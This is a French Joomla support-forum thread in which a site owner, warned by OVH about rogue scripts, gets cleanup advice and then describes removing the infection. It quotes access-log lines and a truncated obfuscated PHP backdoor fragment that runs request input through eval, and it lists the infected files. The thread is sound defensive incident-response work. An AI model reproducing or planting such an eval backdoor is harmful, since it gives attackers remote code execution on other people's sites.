Joomladay francophone 2019 à Paris, les 8 et 9 mars 2019

Hébergement OVH, alerte de sécurité

Réduire
X
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • [RÉGLÉ] Hébergement OVH, alerte de sécurité

    Bonjour,

    depuis quelques semaines, j'ai constamment des message de la part d'OVH concernant mon site web en Joomla 2.5.
    Ils me ferment mon site car j'ai des scripts qui s'exécutent. Apparemment, j'ai un souci de sécurité mais je n'arrive pas à trouver lequel.
    J'ai fait des mises à jours de Joomla! et de plugins/extensions sans succès.

    Est ce que vous avez déjà eu ce cas là ? Est ce que vous avez une idée ?

    Ci-dessous un exemple de message et de script incriminé.
    Il y en a eu plusieurs et toujours le même type de script mais pas la même arborescence.

    Merci de votre aide, je suis dans une impasse.

    Cordialement,

    Throdo

    Bonjour,

    Notre système de surveillance (Okillerd) a détecté une opération
    irrégulière au niveau de votre site.

    Les détails de cette opération sont les suivants :

    xxxxxxxxxx.fr

    Problème rencontré : Executing deleted program
    Commande apparente : ././ps
    Exécutable utilisé : /homez.565/xxxxxxx/www/update/Joomla_2.5.x_to_2.5.18-Stable-Patch_Package/modules/mod_finder/tmpl/.nfs0000000008bcd314000053ce
    Horodatage: 2014-12-30 14:45:10

    Ceci n'est pas autorisé sur nos installations,
    car c'est une tentative potentielle de piratage.

    Si ce n'est pas vous qui avez lancé ce script, cela signifie
    qu'il y a une faille sur votre site et qu'un hacker s'en
    est servi pour réaliser cette opération.

    ou autre exemple de script :
    Problème rencontré : Executing deleted program
    Commande apparente : ././ps
    Exécutable utilisé : /homez.565/xxxxxxxx/www/components/com_jce/editor/tiny_mce/plugins/.nfs00000000049bf0af00000c6b
    Horodatage: 2014-12-30 04:10:04

    Dernière édition par Throdo à 25/01/2015, 22h39 Raison: le problème est réglé :)

  • #2
    Re : Hébergement OVH, alerte de sécurité

    Bonjour,

    dans ce cas de site piraté, il n'y a pas d'autre solution que de remonter une sauvegarde saine, ou d'inspecter minutieusement les fichier pour trouver et corriger la faille.
    Le JoomlaDay 2019 c'est le 8 et 9 mars #jd19fr (plus d'infos)

    Pour apprendre à construire votre site web avec Joomla 3 : Joomla3! Le Livre Pour Tous : http://cinnk.com/joomla/3/le-livre-pour-tous

    Envie de lire sur Joomla!, mais pas que ? Cinnk magazine http://cinnk.com/magazine

    Créez votre boutique en ligne avec Joomla! & HikaShop http://cinnk.com/boutique/livres/cre...la-et-hikashop

    Commentaire


    • #3
      Re : Hébergement OVH, alerte de sécurité

      Bonsoir,
      et au passage, je comprends mal pourquoi tu as laisser des bout de code d'un joomla dezippé dans "update"
      www/update/Joomla_2.5.x_to_2.5.18-Stable-Patch_Package
      Sinon, une chose est sure ... ton site s'est fait hacké et en general, ça laisse PLUSIEURS portes ouvertes pour que les malveillants puissent revenir ...
      Le JoomlaDay 2019 aura lieu le 8 et 9 mars à Paris ... On vous attend tous pour rencontrer la communauté, faire plus ample connaissance, assister aux conférences .... et surtout passer un CHOUETTE moment tous ensemble !

      “Un message d’erreur sur votre site Joomla ... ayez le reflexe de consulter le nouveau service (en Beta) de la base de connaissance
      https://kb.joomla.fr

      Ce forum, vous l'aimez ? il vous a sauvé la vie ? Vous y apprenez chaque jour ? Alors adhérez à l'AFUJ https://www.joomla.fr/association/adherer

      Commentaire


      • #4
        Re : Hébergement OVH, alerte de sécurité

        Bonjour

        Je lis que tu as mis à jour (voulu mettre à jour) Joomla! : c'est une excellente initiative mais ce n'est pas assez. Les pirates qui cherchent à exploiter les ressources de ton serveur modifient en effet des fichiers natifs mais, surtout, en déposent d'autres. Et là, que tu mettes à jour ou pas, ces fichiers -inconnus de Joomla!- ne sont pas modifiés et restent donc en place.

        A te lire, tu as aussi des vieux fichiers qui trainent (/update/Joomla_2.5.x_to_2.5.18-Stable-Patch_Package), il faudrait donc faire un joli nettoyage de ton site et de tes fichiers.

        Cela ne peut se faire qu'en local, après avoir téléchargé une version de ton site "en l'état" après l'avoir nettoyer. Pour cela, compte plusieurs heures de travail parce qu'il n'y a pas de recettes miraculeuses, c'est souvent manuel. Tu vas t'épargner un gros travail en supprimant (en local!!!!!!), tous les dossiers de Joomla excepté /images et /media et en remettant une version fraiche de Joomla, de ton template, des modules, composants, ... que tu utilises. C'est la meilleure manière de procéder mais comme tu les comprends, elle prend un certain temps.

        Restera les dossiers /images et /medias qu'il faudra traiter manuellement pour en extraire les codes virusés.

        Bonne journée et excellent réveillon.
        Christophe (cavo789)
        Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)
        Développeur de marknotes, logiciel de gestion de prises de notes avec interface web et de multiples convertisseur https://github.com/cavo789/marknotes
        Mes logiciels OpenSource : https://www.avonture.be
        Les 8 et 9 mars prochain ? J'peux pas, j'ai JoomlaDay 2019 #jd19fr (plus d'infos)

        Commentaire


        • #5
          Re : Hébergement OVH, alerte de sécurité

          Bonjour,

          Merci pour vos réponses et vos conseils.

          Est ce que vous pensez que la base de données peut elle aussi comporter des "sql injections" et donc aussi d'être infecté.
          Ne serait-ce pas le moment d'en profiter pour migrer vers la version 3 de Joomla! ?

          autre question, est ce que je dois considérer que j'ai fait une mauvaise utilisation de Joomla! ou alors est ce que Joomla! a des failles qui sont connues des pirates ?

          Merci et bonne année.

          Commentaire


          • #6
            Re : Hébergement OVH, alerte de sécurité

            Bonjour,


            Est ce que vous pensez que la base de données peut elle aussi comporter des "sql injections" et donc aussi d'être infecté.
            Oui, cela est possible.


            Ne serait-ce pas le moment d'en profiter pour migrer vers la version 3 de Joomla! ?
            Ce serait en effet une bonne idée, la version 2.5 de Joomla! n'est désormais plus supportée.


            autre question, est ce que je dois considérer que j'ai fait une mauvaise utilisation de Joomla! ou alors est ce que Joomla! a des failles qui sont connues des pirates ?
            Joomla! est un système fiable et sécurisé, à partir du moment où il est à jour et que les extensions installées le sont également.
            Ensuite, il est important d'avoir des mots de passe solides (FTP connexion au panneau d'admin de l'hébergeur, connexion à Joomla!) et également d'avoir un ordinateur propre.

            Ensuite, il est également possible d'accroitre la sécurité de Joomla!, par exemple en utilisant une extension comme aeSecure :
            http://www.aesecure.com/en/
            Le JoomlaDay 2019 c'est le 8 et 9 mars #jd19fr (plus d'infos)

            Pour apprendre à construire votre site web avec Joomla 3 : Joomla3! Le Livre Pour Tous : http://cinnk.com/joomla/3/le-livre-pour-tous

            Envie de lire sur Joomla!, mais pas que ? Cinnk magazine http://cinnk.com/magazine

            Créez votre boutique en ligne avec Joomla! & HikaShop http://cinnk.com/boutique/livres/cre...la-et-hikashop

            Commentaire


            • #7
              Re : Hébergement OVH, alerte de sécurité

              Envoyé par Throdo Voir le message
              Bonjour,

              Merci pour vos réponses et vos conseils.

              Est ce que vous pensez que la base de données peut elle aussi comporter des "sql injections" et donc aussi d'être infecté.
              Ne serait-ce pas le moment d'en profiter pour migrer vers la version 3 de Joomla! ?

              autre question, est ce que je dois considérer que j'ai fait une mauvaise utilisation de Joomla! ou alors est ce que Joomla! a des failles qui sont connues des pirates ?

              Merci et bonne année.
              Non je ne pense pas, c'est finalement assez rare des sql injections, on a plus affaire à des utilisations frauduleuses de ressources.

              Non, tu n'as pas fait une mauvaise utilisation, juste, je vois que tu es inscrit depuis 2008 et seulement 9 posts depuis... Ce qui signifie que tu n'as pas tellement suivi l'actu Joomla. Le fait que cela soit un open source demande de se maintenir à jour car les plans de la citadelle sont accessibles... gratuitement pour tous hacker compris

              Bonne année 2015
              Christophe
              http://www.webcrea.fr

              Commentaire


              • #8
                Re : Hébergement OVH, alerte de sécurité

                Je confirme aussi que les SQL Injections, dans le sens "code malveillant se trouvant dans la base de données", c'est assez rare. On parle ici p.ex. de IFRAME qui seraient dans des articles.

                Maintenant, SQL injections n'est pas restreint à ça; tu peux exploiter les données par des queries (select * from users p.ex.) ou créer de nouveaux utilisateurs (insert into ...). Regarde donc si tu as p.ex. des nouveaux admins indésirables.

                Reste maintenant à, oui, protéger ton site, à en restreindre autant que faire se peu son accès frauduleux, non désiré. Il y a des logiciels de type firewall (parefeu) qui vise à cette protection. Tu dois aussi choisir un hébergeur sérieux, conscient de la sécurisation de ses clients et, enfin, adopter une attitude sécuritaire de ton côté (un exemple : ne pas installer n'importe quoi, provenant de n'importe où).

                Bonne soirée.
                Christophe (cavo789)
                Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)
                Développeur de marknotes, logiciel de gestion de prises de notes avec interface web et de multiples convertisseur https://github.com/cavo789/marknotes
                Mes logiciels OpenSource : https://www.avonture.be
                Les 8 et 9 mars prochain ? J'peux pas, j'ai JoomlaDay 2019 #jd19fr (plus d'infos)

                Commentaire


                • #9
                  Re : Hébergement OVH, alerte de sécurité

                  Bonjour, c'est maintenant réglé depuis quelques jours le site est en ligne et il n'y a plus de soucis.
                  Je partage avec vous ce que j'ai fait.

                  J'ai tout d'abord mise à jour les plugins, modules ainsi que la version de Joomla! pour être le plus à jour possible.
                  Par contre les soucis ont quand même continués car des fichiers avaient été changés par des injections de code php.

                  J'ai donc regardé les logs du serveurs pour avoir des infos sur les modules et les plugins touchés par les hackers.

                  [30/Dec/2014:14:41:36 +0100] "POST /components/com_joomgallery/models/image.php HTTP/1.1" 200 71 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
                  [30/Dec/2014:14:41:37 +0100] "POST /update/Joomla_2.5.x_to_2.5.18-Stable-Patch_Package/modules/mod_finder/tmpl/ini.php HTTP/1.1" 200 82 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
                  J'ai réussi, en inspectant les répertoires de mon site que j'avais descendu sur mon ordinateur perso, à trouver un répertoire nommé 'js' avec un fichier php dedans. Ce qui m'a paru suspect. Effectivement le contenu l'était !

                  Voici un bout du code du fichier qui se trouvait entre autre entre des balise php.
                  ... PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['n79c1ec'])) {eval($s21(${$s20}['n79c1ec' ...
                  Après quelques commandes grep sur des mots clés comme "PCT4BA6ODSE_" ou "n79c1ec", j'ai isolé un certain nombres de fichiers dont voici la liste :

                  ./components/com_easybookreloaded/models/ajax.php
                  ./components/com_jce/editor/tiny_mce/plugins/dirs.php
                  ./components/com_jce/media/img/stats.php
                  ./components/com_joomgallery/views/report/diff.php
                  ./components/com_weblinks/models/forms/ajax.php
                  ./components/com_wrapper/views/wrapper/view.html.php
                  ./images/Trombinoscope/Photos_soumises/sql.php
                  ./libraries/cms/form/field/menu.php
                  ./libraries/gjfields/article.php
                  ./libraries/joomla/database/database/db.php
                  ./libraries/joomla/html/language/alias.php
                  ./libraries/kunena/forum/statistics.php
                  ./libraries/kunena/pagination/pagination.php
                  ./libraries/syw/fields/title.php
                  ./media/kunena/js/bootstrap/xml.php
                  ./media/media/images/title.php
                  ./media/media/js/session.php
                  ./media/system/images/modal/press.php
                  ./modules/mod_banners/helper.php
                  ./modules/mod_dn/model.php
                  ./modules/mod_trombinoscope/helper.php
                  ./plugins/content/jw_allvideos/jw_allvideos/css.php
                  ./plugins/content/notifyarticlesubmit/language/en-GB/files.php
                  ./plugins/editors/jckeditor/plugins/readmore/help.php
                  ./plugins/system/log/log.php
                  ./templates/atomic/html/mod_menu/default.php
                  ./tmp/install_522fc288771f6/language/spanish.php
                  ./tmp/install_522fc2cb23789/language/dutch.php

                  Que j'ai nettoyé soit des balises en entête du fichier soit du fichier car il n'avait pas sa place.

                  Depuis, plus rien.

                  Merci de votre aide, peut être que ça peut aider quelqu'un d'autre d'où mon partage.

                  Commentaire


                  • #10
                    Re : Hébergement OVH, alerte de sécurité

                    Merci pour ton retour car oui, cela peut intéresser certaines personnes dans le même cas et qui auraient les mêmes compétences que toi pour faire ce nettoyage.

                    (Tu penses à passer ton post en Réglé ?)

                    Merci
                    Christophe (cavo789)
                    Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)
                    Développeur de marknotes, logiciel de gestion de prises de notes avec interface web et de multiples convertisseur https://github.com/cavo789/marknotes
                    Mes logiciels OpenSource : https://www.avonture.be
                    Les 8 et 9 mars prochain ? J'peux pas, j'ai JoomlaDay 2019 #jd19fr (plus d'infos)

                    Commentaire

                    Annonce

                    Réduire
                    1 sur 2 < >

                    C'est [Réglé] et on n'en parle plus ?

                    A quoi ça sert ?
                    La mention [Réglé] permet aux visiteurs d'identifier rapidement les messages qui ont trouvé une solution.

                    Merci donc d'utiliser cette fonctionnalité afin de faciliter la navigation et la recherche d'informations de tous sur le forum.

                    Si vous deviez oublier de porter cette mention, nous nous permettrons de le faire à votre place... mais seulement une fois
                    Comment ajouter la mention [Réglé] à votre discussion ?
                    1 - Aller sur votre discussion et éditer votre premier message :


                    2 - Cliquer sur la liste déroulante Préfixe.

                    3 - Choisir le préfixe [Réglé].


                    4 - Et voilà… votre discussion est désormais identifiée comme réglée.

                    2 sur 2 < >

                    Assistance au forum - Outil de publication d'infos de votre site

                    Compatibilité: PHP 4.1,PHP4, 5, 6DEV MySQL 3.2 - 5.5 MySQLi from 4.1 ( @ >=PHP 4.4.9)

                    Support Version de Joomla! : | J!3.0 | J!2.5.xx | J!1.7.xx | J!1.6.xx | J1.5.xx | J!1.0.xx |

                    Version française (FR) D'autres versions sont disponibles depuis la version originale de FPA

                    UTILISER À VOS PROPRES RISQUES :
                    L'exactitude et l'exhaustivité de ce script ainsi que la documentation ne sont pas garanties et aucune responsabilité ne sera acceptée pour tout dommage, questions ou confusion provoquée par l'utilisation de ce script.

                    Problèmes connus :
                    FPA n'est actuellement pas compatible avec des sites Joomla qui ont eu leur fichier configuration.php déplacé en dehors du répertoire public_html.

                    Installation :

                    1. Téléchargez l'archive souhaitée : http://afuj.github.io/FPA/

                    Archive zip : https://github.com/AFUJ/FPA/zipball/master

                    2. Décompressez le fichier de package téléchargé sur votre propre ordinateur (à l'aide de WinZip ou d'un outil de décompression natif).

                    3. Lisez le fichier LISEZMOI inclus pour toutes les notes de versions spécifiques.

                    4. LIRE le fichier de documentation inclus pour obtenir des instructions d'utilisation détaillées.

                    5. Téléchargez le script fpa-fr.php à la racine de votre site Joomla!. C'est l'endroit que vous avez installé Joomla et ce n'est pas la racine principale de votre serveur. Voir les exemples ci-dessous.

                    6. Exécutez le script via votre navigateur en tapant: http:// www. votresite .com/ fpa-fr.php
                    et remplacer www. votresite .com par votre nom de domaine


                    Exemples:
                    Joomla! est installé dans votre répertoire web et vous avez installé la version française du fichier FPA:
                    Télécharger le script fpa-fr.php dans: /public_html/
                    Pour executer le script: http://www..com/fpa-fr.php

                    Joomla! est installé dans un sous-répertoire nommé "cms" et vous avez installé la version française du fichier FPA:
                    Télécharger le script fpa-fr.php dans: /public_html/cms/
                    Pour executer le script: http://www..com/cms/fpa-fr.php

                    En raison de la nature très sensible de l'information affichée par le script FPA, il doit être retiré immédiatement du serveur après son utilisation.

                    Pour supprimer le script de votre site, utilisez le lien de script de suppression fourni en haut de la page du script. Si le lien de suppression échoue pour supprimer le script, utilisez votre programme FTP pour le supprimer manuellement ou changer le nom une fois que le script a généré les données du site et le message publié sur le forum. Si le script est toujours présent sur le site, il peut être utilisé pour recueillir suffisamment d'informations pour pirater votre site. Le retrait du script empêche des étrangers de l'utiliser pour jeter un oeil à la façon dont votre site est structuré et de détecter les défauts qui peuvent être utilisé à vos dépends.
                    Voir plus
                    Voir moins

                    Partenaire de l'association

                    Réduire

                    Hébergeur Web PlanetHoster
                    Travaille ...
                    X